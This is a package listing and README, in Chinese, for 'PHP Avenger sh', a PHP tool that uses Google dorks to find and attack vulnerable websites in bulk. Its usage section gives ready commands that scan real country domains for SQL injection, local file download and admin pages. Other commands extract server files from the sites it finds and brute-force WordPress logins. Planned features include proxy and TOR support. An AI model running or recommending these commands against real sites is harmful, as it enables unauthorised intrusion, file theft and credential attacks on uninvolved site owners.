通过 
搜索
搜索aszone / avenger-sh
AsZone 组件 - 搜索黑客工具
v0.2.4
2016-10-03 05:18 UTC
Requires
- php: >=5.3.9
- aszone/hacking: ~0.1
- aszone/search-hacking: ~0.1
- aszone/simple_html_dom: ~1.5
- aszone/vulnerabilities: ~0.1.1
- knplabs/console-service-provider: ^1.0
- lenonleite/exploits: ~0.1
- swiftmailer/swiftmailer: ^5.4
This package is not auto-updated.
Last update: 2024-09-18 20:29:55 UTC
README
PHP Avenger 是一个专注于安全和黑客的 PHP 开源工具的现代集合。
测试版
- PHP Avenger sh (搜索引擎)
未来实现
- PHP Avenger bt (暴力破解)
- PHP Avenger sca (状态代码分析)
- PHP Avenger pwp (WordPress 插件)
- PHP Avenger cj (Joomla 组件)
PHP Avenger SH
Php Avenger sh 是一个基于 Cleiton Pinheiro 的 inurlbr 分支的 open source 工具。基本上,PHP Avenger sh 是一个通过大量扫描和检查漏洞是否为真或假的自动化过程来检测可能漏洞的工具。Php Avenger 使用谷歌、必应和其他搜索引擎通过 dorks (高级搜索)。
安装
推荐通过 Composer 安装 PHP Avenger。
# Install Composer curl -sS https://composer.php.ac.cn/installer | php
然后,运行 Composer 命令安装 Php Avenger SH 最新测试版
php composer.phar create-project aszone/avenger-sh
cd avenger-sh
基本用法
使用以下命令初始化过程,结果将在监视器中打印并保存在
results文件夹中的.txt文件中。
获取垃圾搜索
php avenger sh --dork="site:com.ar ext:sql password"
垃圾搜索结果
检查 SQL 注入
php avenger sh --dork="site:com.ar inurl:php?id=" --check="sqli"
SQL 注入结果
检查本地文件下载
php avenger sh --dork="site:com.ar inurl:download.php?file=" --check="lfd"
本地文件下载结果
检查和利用本地文件下载
此命令将检查漏洞并提取服务器文件。文件将保存在 /results/exploits/lfd/。
php avenger sh --dork="site:com.mx inurl:download.php?file=" --check="lfd" --exploit="lfd"
提取文件结果
提取文件视频
检查管理员页面
php avenger sh --dork="site:com.ar inurl:admin" --check="isAdmin"
检查管理员页面,如果管理员页面是 WordPress,则获取所有用户并开始暴力破解
php avenger sh --dork="site:com inurl:wp-content/uploads" --check="isAdmin" --exploit="btwp"
命令帮助
php avenger sh
详细信息
搜索引擎
- 谷歌
- 谷歌API
- 必应
- DuckDuckGo
- 雅虎
- Yandex
涵盖的漏洞
- SQL 注入 (SQLI)
- 本地文件下载 (LFD)
- 管理员页面
- 远程文件包含 (RFI)
- 跨站脚本 (XSS)
涵盖的利用
- 本地文件下载 (LFD)
- WordPress 暴力破解
下一版本中的涵盖漏洞
- 敏感文件
- 转储文件
- 配置文件
- 打开文件夹
开发中的功能
- 强力搜索
- 发送包含结果的有邮件
- 命名
.txt结果文件 - 代理
- TOR
- 代理站点
- virgin 代理
帮助和文档
- 文档.
- 示例.
- 视频.
- Stackoverflow.